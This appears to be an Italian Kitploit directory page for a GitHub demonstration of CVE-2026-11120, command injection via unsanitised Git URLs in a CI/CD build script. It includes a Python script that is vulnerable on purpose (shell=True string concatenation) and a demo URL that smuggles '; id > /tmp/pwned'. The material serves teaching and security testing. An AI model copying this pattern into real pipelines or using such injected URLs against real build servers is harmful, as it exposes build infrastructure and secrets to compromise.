Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-11120-Command-Injection-via-Git-URL-in-CI-CD-Pipeline — Dimostra l'iniezione di comandi tramite URL Git non sanificati nelle pipeline CI/CD, includendo uno script di build vulnerabile e un esempio di exploit per una CVE critica. | Kitploit
Strumenti/GitHubGitHub/george0papasotiriou/cve-2026-11120-command-injection-via-git-url-in-ci-cd-pipeline
Analisi delle VulnerabilitàExploitDevSecOpsApprendimento e Formazione
GitHubgeorge0papasotiriou/cve-2026-11120-command-injection-via-git-url-in-ci-cd-pipeline

CVE-2026-11120-Command-Injection-via-Git-URL-in-CI-CD-Pipeline

Dimostra l'iniezione di comandi tramite URL Git non sanificati nelle pipeline CI/CD, includendo uno script di build vulnerabile e un esempio di exploit per una CVE critica.

Vedi Repository
11 mese faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-11120 – Iniezione di comandi tramite URL Git nella pipeline CI/CD

Codice del programma (Python)

root@kitploit:~
# cicd_build.py - Clones repository without sanitizing URL
import subprocess, sys

def clone_and_build(repo_url):
    # Vulnerability: repo_url can contain shell metacharacters
    cmd = f"git clone {repo_url} /tmp/repo"
    subprocess.check_call(cmd, shell=True)
    # Build steps...

if __name__ == '__main__':
    # Simulate attacker-controlled input
    malicious_url = "https://github.com/org/repo.git; id > /tmp/pwned"
    clone_and_build(malicious_url)

CVE-2026-11120 – Iniezione di comandi tramite URL Git in CI/CD

Severity: Critical

Panoramica

Uno script della pipeline CI/CD utilizza URL di repository Git forniti dall'utente senza sanitizzazione in un comando shell. Un attaccante può iniettare comandi shell includendo caratteri speciali (ad es. ;, &&) nell'URL, portando all'esecuzione arbitraria di comandi sul server di build.

Dettagli della vulnerabilità

  • Tipo: Iniezione di comandi
  • Impatto: Compromissione dell'infrastruttura di build, perdita di segreti.
  • Causa principale: L'URL del repository viene concatenato direttamente in un comando shell senza escape o validazione.

Dimostrazione dell'exploit

Eseguire lo script vulnerabile:

root@kitploit:~
python cicd_build.py

Esegue il comando id iniettato, creando /tmp/pwned.

Scarica lo strumento